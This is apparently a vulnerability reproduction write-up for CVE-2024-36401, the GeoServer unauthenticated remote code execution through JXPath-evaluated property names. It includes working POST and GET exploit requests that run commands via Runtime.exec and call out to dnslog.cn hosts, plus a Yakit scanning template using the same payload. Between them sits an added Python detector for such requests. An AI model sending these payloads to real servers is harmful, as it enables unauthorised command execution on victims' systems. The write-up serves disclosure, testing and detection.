GeoServer property expression injection remote code execution vulnerability (CVE-2024-36401)
1. Vulnerability description
GeoServer is an open-source server written in Java whose main purpose is to let users share and edit geospatial data. It was designed for interoperability and publishes spatial data in many common formats using open standards.
Prior to versions 2.23.6, 2.24.4 and 2.25.2, GeoServer allows an unauthenticated user to achieve code execution against a default installation through specially crafted input in multiple OGC request parameters. The root cause is that property (attribute) names are unsafely evaluated as XPath expressions: an attacker who controls a property name, for example the valueReference of a WFS GetPropertyValue request, can supply an XPath expression that is evaluated by Apache Commons JXPath, and JXPath's extension functions allow calling arbitrary Java methods such as java.lang.Runtime.exec, which gives arbitrary command execution on the server. Upgrading to 2.23.6, 2.24.4 or 2.25.2 fixes the issue.
2. Reproduction
Environment setup
https://master.dl.sourceforge.net/project/geoserver/GeoServer/2.20.0/geoserver-2.20.0-bin.zip?viasf=1
After downloading, run startup.bat in the bin directory to start the server (2.20.0 is an affected release). Because of a port conflict on my machine, I changed the port to 8087 in start.ini.
Reproduction:
POST request
POST /geoserver/wfs HTTP/1.1
Host: 192.168.236.196:8087
Content-Type: application/xml
Content-Length: 334

<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"ping hovmgt.dnslog.cn")'>
<wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>
The DNSLog callback arrives, which confirms that the command was executed on the server.
GET request:
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27curl%20fkm7iy.dnslog.cn%27) HTTP/1.1
Host: 192.168.236.196:8087
Cookie: JSESSIONID=node01odk521suledd1lff372goa4v44.node0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
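As an added example that is not part of the original write-up, of GeoServer or of Yakit: a small Python checker that pulls the property expressions out of captured requests like the two above (KVP query string and XML POST body) and flags JXPath function calls such as exec(java.lang.Runtime.getRuntime(), ...). The sample requests are constructed copies of the ones shown; the parameter list (valueReference, propertyName) and the definition of a "safe" property path are assumptions made for this illustration, not GeoServer's own rules.

```python
"""Offline checker for CVE-2024-36401 exploitation attempts in captured GeoServer requests.

Added example for this write-up (not GeoServer, Yakit or the author's code).
Inputs are constructed samples modelled on the requests shown above.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Constructed samples (not real traffic): the two requests from the write-up plus a benign one.
SAMPLE_GET_LINE = (
    "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
    "&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),"
    "%27curl%20fkm7iy.dnslog.cn%27) HTTP/1.1"
)
SAMPLE_POST_BODY = """<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'
valueReference='exec(java.lang.Runtime.getRuntime(),"ping hovmgt.dnslog.cn")'>
<wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>"""
BENIGN_GET_LINE = (
    "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
    "&typeNames=topp:states&valueReference=STATE_NAME HTTP/1.1"
)

# Request parameters whose value GeoServer treats as a property name. valueReference is the
# one exploited on this page; propertyName is an assumption (same evaluation path).
PROPERTY_PARAMS = {"valuereference", "propertyname"}

# Assumed shape of a legitimate property reference: an optionally prefixed name, possibly
# followed by simple XPath steps such as geom/@srsName. No parentheses, quotes or package paths.
SAFE_PROPERTY = re.compile(
    r"^[A-Za-z_][\w.\-]*(?::[A-Za-z_][\w.\-]*)?(?:/@?[A-Za-z_][\w.\-]*)*$"
)


def classify_expression(expr: str) -> str:
    """'benign' for a plain property path; 'function-call' when the value contains a call
    (JXPath extension functions such as exec(java.lang.Runtime.getRuntime(), ...));
    'suspicious' for anything else that is not a plain property path."""
    if SAFE_PROPERTY.match(expr):
        return "benign"
    if "(" in expr or "java." in expr:
        return "function-call"
    return "suspicious"


def property_values_from_get(request_line: str) -> list:
    """Pull property-name parameters out of a KVP request line. Keys are matched
    case-insensitively (OGC KVP is case-insensitive) and values are percent-decoded,
    so %27 / %20 encoded payloads are seen the way the server sees them."""
    target = request_line.split(" ")[1]
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    found = []
    for name, values in params.items():
        if name.lower() in PROPERTY_PARAMS:
            found.extend(values)
    return found


def property_values_from_xml(body: str) -> list:
    """Pull valueReference attributes and PropertyName/ValueReference element text out of an
    XML POST body, ignoring namespace prefixes."""
    found = []
    for el in ET.fromstring(body).iter():
        for attr, value in el.attrib.items():
            if attr.rsplit("}", 1)[-1].lower() == "valuereference":
                found.append(value)
        local = el.tag.rsplit("}", 1)[-1].lower()
        if local in PROPERTY_PARAMS and el.text and el.text.strip():
            found.append(el.text.strip())
    return found


def inspect_request(request_line: str, body: str = None) -> tuple:
    """Return (verdict, expressions) for one captured request."""
    exprs = property_values_from_get(request_line)
    if body:
        try:
            exprs += property_values_from_xml(body)
        except ET.ParseError:
            return "unparseable-xml", exprs
    verdicts = {classify_expression(e) for e in exprs}
    if "function-call" in verdicts:
        return "exploit-attempt", exprs
    if "suspicious" in verdicts:
        return "suspicious", exprs
    return "benign", exprs


if __name__ == "__main__":
    for label, line, body in (
        ("GET", SAMPLE_GET_LINE, None),
        ("POST", "POST /geoserver/wfs HTTP/1.1", SAMPLE_POST_BODY),
        ("benign", BENIGN_GET_LINE, None),
    ):
        print(label, inspect_request(line, body))
```

Two details matter when turning this into a real detection: decode the query string before matching (the GET payload above only shows `exec(` in clear because the parentheses were not encoded, while the quotes and spaces were), and treat the parameter names case-insensitively, since `VALUEREFERENCE=` is accepted by the server just as well as `valueReference=`. A rule that only looks for the literal string `java.lang.Runtime` in the raw URL misses both.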
3. Yakit detection template
id: CVE-2024-36401-GeoServer-wfs-rce

info:
  name: GeoServer property expression injection remote code execution vulnerability (CVE-2024-36401)
  author: god
  severity: critical
  description: GeoServer property expression injection remote code execution vulnerability (CVE-2024-36401)

http:
  - raw:
      - |-
        @timeout: 30s
        POST /geoserver/wfs HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <wfs:GetPropertyValue service='WFS' version='2.0.0'
        xmlns:topp='http://www.openplans.org/topp'
        xmlns:fes='http://www.opengis.net/fes/2.0'
        xmlns:wfs='http://www.opengis.net/wfs/2.0'
        valueReference='exec(java.lang.Runtime.getRuntime(),"ping {{interactsh-url}}")'>
        <wfs:Query typeNames='topp:states'/>
        </wfs:GetPropertyValue>

    max-redirects: 3
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "dns"
        part: interactsh_protocol